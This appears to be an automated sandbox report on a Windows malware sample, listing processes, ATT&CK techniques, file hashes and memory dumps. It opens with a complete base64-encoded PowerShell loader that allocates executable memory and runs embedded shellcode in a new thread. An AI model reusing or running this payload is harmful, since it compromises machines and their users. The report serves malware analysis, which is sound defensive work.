      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABKAEEARwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEoAQQBHACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjADYALAAwAHgAYgA4ACwAMAB4AGEAMwAsADAAeABjAGEALAAwAHgAYQA4ACwAMAB4AGIAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANAA1ACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgAZQA2ACwAMAB4AGQAOQAsADAAeAA0AGEALAAwAHgANABlACwAMAB4ADEANAAsADAAeAAzADUALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeABlADQALAAwAHgAYwA2ACwAMAB4ADcAYQAsADAAeAAzAGIALAAwAHgAMAAxACwAMAB4AGYANwAsADAAeABhADgALAAwAHgANQBmACwAMAB4ADQAMgAsADAAeABhAGEALAAwAHgANwBjACwAMAB4ADIAYgAsADAAeAAwADYALAAwAHgANAA3ACwAMAB4AGYANgAsADAAeAA3ADkALAAwAHgAYgAyACwAMAB4AGQAYwAsADAAeAA3AGEALAAwAHgANQA2ACwAMAB4AGIANQAsADAAeAA1ADUALAAwAHgAMwAwACwAMAB4ADgAMAAsADAAeABmADgALAAwAHgANgA2ACwAMAB4AGYANAAsADAAeAAwAGMALAAwAHgANQA2ACwAMAB4AGEANAAsADAAeAA5ADYALAAwAHgAZgAwACwAMAB4AGEANAAsADAAeABmADkALAAwAHgANwA4ACwAMAB4AGMAOAAsADAAeAA2ADcALAAwAHgAMABjACwAMAB4ADcAOAAsADAAeAAwAGQALAAwAHgAMwBlACwAMAB4ADcAYQAsADAAeAA5ADUALAAwAHgAYwAzACwAMAB4ADkANwAsADAAeAAwAGYALAAwAHgAMwBiACwAMAB4AGYANAAsADAAeAA5AGMALAAwAHgANQAyACwAMAB4ADgAMAAsADAAeABmADUALAAwAHgANwAyACwAMAB4AGQAOQAsADAAeABiADgALAAwAHgAOABkACwAMAB4AGYANwAsADAAeAAxAGUALAAwAHgANABjACwAMAB4ADIAMgAsADAAeABmADYALAAwAHgANABlACwAMAB4ADIANgAsADAAeABmADIALAAwAHgAZQAwACwAMAB4AGUANQAsADAAeAA2ADEALAAwAHgAMgAzACwAMAB4ADEAMQAsADAAeAAyADkALAAwAHgAYwAxACwAMAB4AGEANgAsADAAeABkADgALAAwAHgAYgA5ACwAMAB4AGQAZQAsADAAeAA5ADkALAAwAHgAMgA1ACwAMAB4ADAAOAAsADAAeAA5ADQALAAwAHgAZQBlACwAMAB4ADUAMgAsADAAeAA4AGEALAAwAHgANwBjACwAMAB4ADMAZgAsADAAeABhADQALAAwAHgAMgAxACwAMAB4ADQAMQAsADAAeAA4AGYALAAwAHgAMgA5ACwAMAB4ADMAYgAsADAAeAA4ADUALAAwAHgAMgA4ACwAMAB4AGQAMQAsADAAeAA0AGUALAAwAHgAZgBkACwAMAB4ADQAYQAsADAAeAA2AGMALAAwAHgANAA5ACwAMAB4AGMANgAsADAAeAAzADEALAAwAHgAYQBhACwAMAB4AGQAYwAsADAAeABkADkALAAwAHgAOQAyACwAMAB4ADMAOQAsADAAeAA0ADYALAAwAHgAMwBlACwAMAB4ADIAMgAsADAAeABlAGUALAAwAHgAMQAxACwAMAB4AGIANQAsADAAeAAyADgALAAwAHgANQBiACwAMAB4ADUANQAsADAAeAA5ADEALAAwAHgAMgBjACwAMAB4ADUAYQAsADAAeABiAGEALAAwAHgAYQA5ACwAMAB4ADQAOQAsADAAeABkADcALAAwAHgAMwBkACwAMAB4ADcAZQAsADAAeABkADgALAAwAHgAYQAzACwAMAB4ADEAOQAsADAAeAA1AGEALAAwAHgAOAAwACwAMAB4ADcAMAAsADAAeAAwADMALAAwAHgAZgBiACwAMAB4ADYAYwAsADAAeABkADcALAAwAHgAMwBjACwAMAB4ADEAYgAsADAAeABjADgALAAwAHgAOAA4ACwAMAB4ADkAOAAsADAAeAA1ADcALAAwAHgAZgBiACwAMAB4AGQAZgAsADAAeAA5AGQALAAwAHgAOQA3ACwAMAB4ADAAMwAsADAAeABlADAALAAwAHgAYwAzACwAMAB4ADAAZgAsADAAeABjAGYALAAwAHgAMgBjACwAMAB4AGYAYwAsADAAeABjAGYALAAwAHgANAA3ACwAMAB4ADIANwAsADAAeAA4AGYALAAwAHgAZgBkACwAMAB4AGMAOAAsADAAeAA5ADMALAAwAHgAMAA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAMwBkACwAMAB4AGQAZgAsADAAeABjADcALAAwAHgAOAA2ACwAMAB4AGIAZQAsADAAeAAwAGYALAAwAHgANgBmACwAMAB4AGMANgAsADAAeAA0ADEALAAwAHgAYgAwACwAMAB4ADkAMAAsADAAeABjAGUALAAwAHgAOAA1ACwAMAB4AGUANAAsADAAeABjADAALAAwAHgANwA4ACwAMAB4ADIAYwAsADAAeAA4ADUALAAwAHgAOABhACwAMAB4ADcAOAAsADAAeABkADEALAAwAHgANQAwACwAMAB4ADIANgAsADAAeAA3ADMALAAwAHgANAA1ACwAMAB4ADkAYgAsADAAeAAxAGYALAAwAHgAMwAxACwAMAB4AGIAMQAsADAAeAA3ADMALAAwAHgANgAyACwAMAB4ADMANgAsADAAeAA5AGUALAAwAHgAOABjACwAMAB4AGUAYgAsADAAeABkADAALAAwAHgAYgAwACwAMAB4AGMAMgAsADAAeABiAGIALAAwAHgANABjACwAMAB4ADcAMAAsADAAeABiADMALAAwAHgANwBiACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgAZAA5ACwAMAB4ADcAMwAsADAAeAA2ADIALAAwAHgAMwA4ACwAMAB4AGUAMgAsADAAeAA1ADkALAAwAHgAMABiACwAMAB4AGQAMgAsADAAeAAwAGQALAAwAHgAMwA0ACwAMAB4ADYAMwAsADAAeAA0AGEALAAwAHgAYgA3ACwAMAB4ADEAZAAsADAAeABmAGYALAAwAHgAZQBiACwAMAB4ADMAOAAsADAAeAA4ADgALAAwAHgAOAA1ACwAMAB4ADIAYgAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADcAOQAsADAAeABlADUALAAwAHgAMwAzACwAMAB4ADMANQAsADAAeAA2ADkALAAwAHgAOQAxACwAMAB4AGIAMwAsADAAeAAwADAALAAwAHgAZAAzACwAMAB4ADMANwAsADAAeABjAGIALAAwAHgAYgBlACwAMAB4ADcAZQAsADAAeABiADcALAAwAHgANQA5ACwAMAB4ADQANQAsADAAeAAyADkALAAwAHgAZQAwACwAMAB4AGYANQAsADAAeAA0ADcALAAwAHgAMABjACwAMAB4AGMANgAsADAAeAA1ADkALAAwAHgAYgA3ACwAMAB4ADcAYgAsADAAeAA1AGQALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABjADQALAAwAHgAMAA5ACwAMAB4ADkAYwAsADAAeABhADEALAAwAHgAYwA0ACwAMAB4AGMAOQAsADAAeABjAGEALAAwAHgAYQBiACwAMAB4AGMANAAsADAAeABhADEALAAwAHgAYQBhACwAMAB4ADgAZgAsADAAeAA5ADYALAAwAHgAZAA0ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAOABiACwAMAB4ADQANQAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4AGYAYQAsADAAeAAzAGEALAAwAHgAZQAyACwAMAB4AGMAZQAsADAAeAAwADAALAAwAHgANgA1ACwAMAB4AGMANAAsADAAeAA1ADAALAAwAHgAZgBhACwAMAB4ADQAMAAsADAAeABkADQALAAwAHgAYQBkACwAMAB4ADIAZAAsADAAeABhAGMALAAwAHgAYQAyACwAMAB4AGQAZgAsADAAeABlAGQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHkANgBFAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB5ADYARQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeQA2AEUALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2476
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5xkugwf6.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1128
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4E8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA4E7.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5xkugwf6.dll

Filesize
3KB

MD5
65066b9cc65fa8e0a11ab3e3dd0b6eba

SHA1
7a62b1a8b0ea20a47d2dcd7e7e2a68b1ee413205

SHA256
b88721d874696d7f241f42f3988bd4cb9580850492902e0a4633d108d7058dfd

SHA512
9f66b06f51cd3c13203f1bf1eaad414344768a5443af81ae86943bf6ac0b573422388b485ded298b3497f2db231b664cd8b4e3020d46f6b66ca640e8d7bdfdfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\5xkugwf6.pdb

Filesize
7KB

MD5
4aa5979c5fac25223c029db52e2afa74

SHA1
678e980e5925d1c9b59576ca18cc13518cf3b7bd

SHA256
df5e0c94f28f2d9b8177047f22636e91e5f3994a7ae39c238d5a5da5b96de079

SHA512
615019e0c8c707e77174320ffb3f9f36cdcbb14cfe240b9b78317aa49b7898e2e9da392b3972232e3eedf57b5461d7ef63bc55c6e30a63d7b50d49fd2a03814a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA4E8.tmp

Filesize
1KB

MD5
8908ec76cf64442cecd9c95eeabdcfef

SHA1
c8855463c20f154d84724d58594025bd1c5ebc14

SHA256
87abfd84c9c72b3053343c22b9cb9478532d04fd7af1b3775faec9719e75b0b8

SHA512
a62d39eec66d145fbbb10052ba8c669d54b8843a25b071020fed8db34341051464d1943253e618972b24af8d51e6ab2711033de378b1f082b649fd1ef94feea7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IOYGNKF5NJISY3EZIXMY.temp

Filesize
7KB

MD5
65ffed567e536cea83310913184019fd

SHA1
0a773cb193e634f268a054c0e8233dcbf8157bce

SHA256
10434464d5c2abefc9ccafe05770f648657047602af15c19ea29e8803c291e44

SHA512
f27acefd0d6be09c003276850c77cc8a498350edbce5a28ab632c3893eb86c0d03e276d4b1ed95dc89d8cf03fe722b9153932dfef99fc49609e34685080ebb21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5xkugwf6.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5xkugwf6.cmdline

Filesize
309B

MD5
00738b1adb2c176cd537fd74ffd25a49

SHA1
4b823955da5e494172f427852799760e46982865

SHA256
6cf51960765bd44eb3153c500c894d03dda68270c442d2010facc7b77292cbd6

SHA512
207923bc19239fbb9262529257071c2452725a7b453cdaac6eef8a88539bb0f24f3cab4b35c475100ef5c8f2147d415d6b759283c299e6bc3eb35964c3b52f46

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA4E7.tmp

Filesize
652B

MD5
2e1d3be3850353337767371e40fe5f82

SHA1
61aee5cb1df6b2785548801152893acc4bae672c

SHA256
d9944fda710ffa2e3cf52ebe47af249f0d050ba34b449b3afac9ca9550c073c0

SHA512
c40a47bf52767ae0b8248ecd43f208c5ac80ac79f52b1e03c20cebb70ad9547100f6a96a8f482e7b15583c0e422ba057a17a1d721d3b1d0f5bcf7a67365e635e

Download Submit
memory/2360-0-0x000007FEF5F13000-0x000007FEF5F14000-memory.dmp

Filesize
4KB

Download
memory/2360-1-0x0000000001040000-0x000000000104A000-memory.dmp

Filesize
40KB

Download
memory/2360-29-0x000007FEF5F13000-0x000007FEF5F14000-memory.dmp

Filesize
4KB

Download
memory/2452-10-0x000007FEF3EB0000-0x000007FEF484D000-memory.dmp

Filesize
9.6MB

Download
memory/2452-9-0x000007FEF3EB0000-0x000007FEF484D000-memory.dmp

Filesize
9.6MB

Download
memory/2452-8-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2452-7-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2452-6-0x000007FEF416E000-0x000007FEF416F000-memory.dmp

Filesize
4KB

Download
memory/2452-30-0x000007FEF3EB0000-0x000007FEF484D000-memory.dmp

Filesize
9.6MB

Download
memory/2452-31-0x000007FEF416E000-0x000007FEF416F000-memory.dmp

Filesize
4KB

Download
memory/2476-28-0x00000000029A0000-0x00000000029A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads